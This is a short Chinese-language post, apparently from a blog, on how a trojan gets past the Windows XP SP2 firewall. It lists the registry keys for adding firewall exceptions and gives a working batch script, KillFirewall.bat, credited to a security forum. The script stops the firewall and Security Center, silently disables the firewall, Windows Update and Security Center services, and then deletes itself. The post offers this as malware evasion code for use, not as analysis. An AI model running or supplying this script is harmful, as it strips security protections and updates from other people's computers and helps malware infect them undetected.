木馬繞過 Windows XP SP2 防火牆的方法

其實內建防火牆可以簡單的用 net stop 來加以 Disable。

進而修改以下的機碼（增加例外）：

Application Exceptions:
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParameters
FirewallPolicyStandardProfileAuthorizedApplicationsList

Port Exceptions:
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParameters
FirewallPolicyStandardProfileGloballyOpenPortsList

[[MORE]]
這裡附上一個批次檔（來自 GovernmentSecurity.org討論區）：
KillFirewall.bat


@echo off
net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswuauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsvc]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
DEL "%Temp%.kill.reg"
DEL %0